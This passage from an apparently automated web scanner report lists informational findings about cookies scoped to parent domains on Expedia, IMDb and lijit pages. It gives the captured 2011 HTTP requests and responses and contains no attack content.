P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Location: http://ad.doubleclick.net/activity;src=1270268;dcnet=4155;boom=23992;sz=1x1;ord=1307963966?
Content-Length: 13
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 13 Jun 2011 11:19:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: CH=32766,00000,18654,53bro,18661,53bro,24785,53c27,34985,00000,24783,53c27,18653,53bro,33114,00000,37991,00000,36760,00000,32619,00000,38066,00000,19029,58T8w,32620,00000,24775,00000,34986,00000,28363,53br0,22244,53br0,34505,00000,24782,53c27,19037,58T8w,34030,00000,32680,00000,34698,00000,34506,00000,19036,58T8w; domain=.imiclk.com; path=/; expires=Tue, 12-Jun-2012 11:03:29 GMT
Set-Cookie: RQ=3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3425,58T8w,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,58T8w,2170,5DuCE,1211,58T8w,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; domain=.imiclk.com; path=/; expires=Tue, 12-Jun-2012 11:03:29 GMT

<html></html>

12.154. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/loadingImage.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/prod/xmlgrid/loadingImage.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; bn_u=5368708931696218534; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 163
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 163
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT

<div style="text-align:center;padding:40px;">Loading deals...<br/><img src="http://www.expedia.com/eta/nocache/stampa.gif" alt="" WIDTH="82" HEIGHT="10"/></div>

12.155. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSRT1=DvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

12.156. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/PsfGridActivities.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SSRT1=EPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:12 GMT
ipsnf3=v.3|US|1|511|washington; expires=Wed, 13-Jun-2012 00:00:01 GMT; path=/; domain=.expedia.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /daily/prod/xmlgrid/psf/PsfGridActivities.asp?dest=New%20York%20City&promo=summersale2011&r=0.3934101234190166 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
ntCoent-Length: 1112
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 1112
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:12 GMT
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Wed, 13-Jun-2012 00:00:01 GMT; path=/; domain=.expedia.com;

<?xml version="1.0"?>
<div class="morewaysCustomTop"></div><div class="morewaysCustom"><div class="morewaysCustomInner"><div class="activityTitle">New York City Activities</div><div class="activityDe
...[SNIP]...

12.157. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSRT1=-_P1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:26:51 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID1=AwCDeikAAAAA5ufnTf9NBgHm5-dNAQDm5-dNAAAAAAAAAADm5-dNAQAnAAAA-gQAAAI; MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; SSRT1=5-fnTQE; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534

Response

12.158. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/deals/summervacationsale/destination_deals.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/deals/summervacationsale/destination_deals.asp?tab=1&dest=Las%20Vegas,%20NV&mcicid=ssdestdeal1 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 68126
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 68347
Date: Mon, 13 Jun 2011 11:27:08 GMT
Connection: close
Set-Cookie: SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...

12.159. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp?7854 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 9539
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 9539
Expires: Sat, 11 Dec 2010 18:01:23 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT

<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:416px;height:366px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:416px;height:366px;}
.pc
...[SNIP]...

12.160. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp?7935 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 8630
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 8630
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT

<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:308px;height:343px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:308px;height:343px;}
.pc
...[SNIP]...

12.161. http://www.expedia.com/hotel.h892034.Hotel-Information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/hotel.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SSRT1=EvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:14 GMT
iEAPID=0000,; Domain=.expedia.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel.h892034.Hotel-Information?chkin=7/14/2011&chkout=7/18/2011&rm1=a2&hashTag=default&mcicid=112321680 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; SSLB=1; ipsnf3=v.3|US|1|511|washington

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:14 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:14 GMT
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/

12.162. http://www.imdb.com/title/tt0944947/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imdb.com
Path:	/title/tt0944947/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cs=i4ngtxIow2LA4IAykCSLUAc/2jlwaVoPNU3JeXR+bJ3wytldB18NKdBpWjlA4XqxAyp5KuNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=/xklkJ6UmgbIlDzGK7GnmQgOAn3+SVT9y+wjW946F35pfwPtXklU/c7BZHV9CnfubUonbp7p9+7OSVT9yK4Uvd5JVMtpSdz9/kliy+7BVP39WsR17do3vt1aZ/6NSlRdWF+Srs7fYurOSVS9XlkU3f5pVP3+SVS9vhkkzf;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=ORTpIPsfQKC0ad7UcfTa2wbpWjlwaWx+JhpqOXQuT6og+kkaN18NKdBpWjlA4Rqx4yp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=r74zZnN5GNCNLsB54oX4bA5/E6t5KVT9+eoAzo7KZ6kJfwPtXklU/c7BBHVdCnfe/Uonbp7p9+7OSVT9yK4Uvd5JVMtpSdz9/kliy+7BVP39WsR17do3vt1aZ/6NSlRdWF+Srs7fYurOSVS9XlkU3f5pVP3+SVS9vhkkzf;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=0y5MmSeCFA7tJZdckMibLwc/2jlwaVoPN88euXRfHKxQysk6918NKdBpWjlA4Tqxwyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=Ms2AwBeH6407dvGQvS6P4gbpWjlwaWx+Ix4KOXZ6HU9Q+nkaF18NKdBpWjlA4Sqxsyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com
cs=B9HGesm1IFjYQnDiNlEWoQYuDLlwaVo5Qyo+3HXMfg2A2tlfl18NKdBpWjlA4dqxoyp5GnNqKaoQyfkqQGlaOUaOGnlQaVoP52nSOXBpbA9g4Vo5c3rKsWP6OXpTemk6A2pamdZ/nGpA/2wuQGlaedB5GhlwSVo5cGlaeTA5Kglw==;expires=Tue, 14 Jun 2011 07:00:00 GMT;path=/;domain=.imdb.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /title/tt0944947/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12.163. http://www.lijit.com/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tpro_inst=deleted; expires=Sun, 13-Jun-2010 11:10:35 GMT; path=/; domain=.lijit.com
